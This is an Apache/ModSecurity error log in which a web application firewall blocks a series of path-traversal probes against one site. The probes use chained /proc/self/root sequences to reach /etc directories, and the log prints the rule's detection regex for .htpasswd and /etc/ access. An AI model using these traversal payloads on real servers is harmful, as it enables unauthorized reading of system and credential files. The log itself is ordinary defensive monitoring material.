[Fri Mar 20 08:01:33.434832 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:47454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pDTJ3M9BSuKP7CAYb_AAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:34.757699 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:47458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pDuoXxyEfFpUF8f-BbgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:39.767281 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:47462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pE11pVZ5mVmJwsFMx-AAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:48.036295 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:60028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pHOoXxyEfFpUF8f-BegAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:59.047203 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:60030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pJ_qxLDW4GITHUkTn1wAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:00.292419 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:58182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pKDJ3M9BSuKP7CAYcIQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:01.603273 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:58198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pKda6ubjKNq_cu4bVggAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:02.775218 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:58208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pKta6ubjKNq_cu4bVhgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:06.163791 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:58218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pLvqxLDW4GITHUkTn4QAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:09.932492 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:58230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pMLninkcc-iUj5ApfGgAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:16.610538 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:38574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pOPqxLDW4GITHUkTn7wAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:17.882314 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:38586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pOfqxLDW4GITHUkTn8gAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:19.162950 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:38594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pO11pVZ5mVmJwsFMyBAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:21.583356 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:51280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pPbninkcc-iUj5ApfIgAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:22.865887 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:51294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pPl1pVZ5mVmJwsFMyBQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:26.808674 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:51298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pQvXLqtnMIWvjpaKbqQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:34.472228 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:51300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pShCii7xarUs8iHZoggAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:35.810997 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:56176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pSxCii7xarUs8iHZohAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:38.216403 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:56180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pTjJ3M9BSuKP7CAYcMQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:40.369247 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:50234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pTzJ3M9BSuKP7CAYcMgAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:41.978939 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:50248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pUfHIg5MgXLBnicP4bQAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
